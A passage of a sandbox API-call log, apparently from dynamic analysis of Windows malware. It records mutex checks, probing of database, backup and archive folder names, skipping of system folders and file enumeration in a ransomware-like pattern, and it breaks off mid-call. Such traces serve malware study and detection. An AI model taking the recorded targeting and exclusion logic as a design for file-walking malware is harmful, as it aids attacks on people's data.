[0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.253] SysReAllocStringLen (in: pbstr=0x18f444*=0x0, psz="C:\\Program Files\\Common Files\\DESIGNER", len=0x26 | out: pbstr=0x18f444*="C:\\Program Files\\Common Files\\DESIGNER") returned 1 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.253] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.253] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.253] GlobalUnlock (hMem=0x45000c) returned 0 [0104.253] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.253] GlobalUnlock (hMem=0x450004) returned 0 [0104.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft\\Exchange Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="䱈@VV企@\x18㽜V\x18\x1b")) returned 0xffffffff [0104.254] GetLastError () returned 0x3 [0104.254] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ Compact Edition\\") returned 21 [0104.254] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft SQL Server", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㼔V\x181")) returned 0xffffffff [0104.255] GetLastError () returned 0x2 [0104.255] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.255] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ Compact Edition\\") returned 9 [0104.255] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Firebird", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㟄X\x18;")) returned 0xffffffff [0104.256] GetLastError () returned 0x2 [0104.256] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ Compact Edition\\") returned 8 [0104.256] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSSQL.1", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㥔X\x18D")) returned 0xffffffff [0104.256] GetLastError () returned 0x2 [0104.257] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.257] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@嵤W企@\x18V\x18j")) returned 0xffffffff [0104.257] GetLastError () returned 0x2 [0104.257] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.257] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Adobe", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@应W企@\x18㟄X\x18q")) returned 0xffffffff [0104.258] GetLastError () returned 0x2 [0104.258] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="adobe\\V`") returned 6 [0104.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Oracle", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@巼W企@\x18㥔X\x18y")) returned 0xffffffff [0104.259] GetLastError () returned 0x2 [0104.259] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.259] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.259] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Archive", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.259] GetLastError () returned 0x2 [0104.260] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Backup", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@应W企@\x18㥔X\x18\x88")) returned 0xffffffff [0104.299] GetLastError () returned 0x2 [0104.299] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="backup㟀X\x10") returned 6 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Reserv", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@巼W企@\x18㟄X\x18\x8f")) returned 0xffffffff [0104.299] GetLastError () returned 0x2 [0104.299] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="reserv㥐X\x10") returned 6 [0104.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e10c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.300] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\Restore", lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58e020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="៹Ђ", cAlternateFileName="V䱠@V企@\x18㥔X\x18\x97")) returned 0xffffffff [0104.300] GetLastError () returned 0x2 [0104.300] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.300] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.300] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.300] GlobalUnlock (hMem=0x450004) returned 0 [0104.300] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.300] GlobalLock (hMem=0x45000c) returned 0x58c010 [0104.300] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.300] GlobalUnlock (hMem=0x450004) returned 0 [0104.300] GlobalHandle (pMem=0x58c010) returned 0x45000c [0104.300] GlobalUnlock (hMem=0x45000c) returned 0 [0104.300] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.300] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.301] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.301] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18ecbc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9480, cbMultiByte=11, lpWideCharStr=0x18e0bc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.302] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.302] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.302] GlobalUnlock (hMem=0x45000c) returned 0 [0104.302] GlobalLock (hMem=0x45000c) returned 0x58a000 [0104.302] GlobalLock (hMem=0x450004) returned 0x58c010 [0104.302] GlobalHandle (pMem=0x58a000) returned 0x45000c [0104.302] GlobalUnlock (hMem=0x45000c) returned 0 [0104.302] GlobalHandle (pMem=0x58c010) returned 0x450004 [0104.302] GlobalUnlock (hMem=0x450004) returned 0 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.302] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=10, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.303] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.303] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=8, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.304] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e0c4, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.304] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\DESIGNER\\", cchLength=0x27 | out: lpsz="c:\\program files\\common files\\designer\\") returned 0x27 [0104.304] SHGetMalloc (in: ppMalloc=0x18f10c | out: ppMalloc=0x18f10c*=0x767666bc) returned 0x0 [0104.304] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f108 | out: ppidl=0x18f108) returned 0x0 [0104.304] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.305] SysReAllocStringLen (in: pbstr=0x18f190*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f190*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.305] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.305] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.305] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.305] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.305] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.306] GlobalUnlock (hMem=0x450004) returned 0 [0104.306] GlobalLock (hMem=0x450004) returned 0x58a000 [0104.306] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.306] GlobalHandle (pMem=0x58a000) returned 0x450004 [0104.306] GlobalUnlock (hMem=0x450004) returned 0 [0104.306] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.306] GlobalUnlock (hMem=0x45000c) returned 0 [0104.306] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5733f0 [0104.306] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.306] FindNextFileW (in: hFindFile=0x5733f0, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0104.306] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f108 | out: lpLocalFileTime=0x18f108) returned 1 [0104.306] FileTimeToDosDateTime (in: lpFileTime=0x18f108, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.306] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.306] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.306] GlobalUnlock (hMem=0x45000c) returned 0 [0104.306] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.306] GlobalLock (hMem=0x450004) returned 0x591988 [0104.306] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.307] GlobalUnlock (hMem=0x45000c) returned 0 [0104.307] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.307] GlobalUnlock (hMem=0x450004) returned 0 [0104.307] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.309] CharLowerBuffW (in: lpsz="MSADDNDR.DLL", cchLength=0xc | out: lpsz="msaddndr.dll") returned 0xc [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e09c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lð\x18", lpUsedDefaultChar=0x0) returned 1 [0104.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, 